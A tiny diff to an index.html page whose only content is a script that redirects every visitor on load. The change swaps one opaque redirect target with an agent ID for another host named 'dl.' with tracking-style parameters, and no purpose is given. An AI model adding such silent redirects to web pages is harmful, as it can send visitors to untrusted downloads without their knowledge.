--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://main.RY872.com/?AgentId=2020481587451805"
+  window.location.href="https://dl.hawcyy.com/?parent=745187&t=1592576498"
 </script>
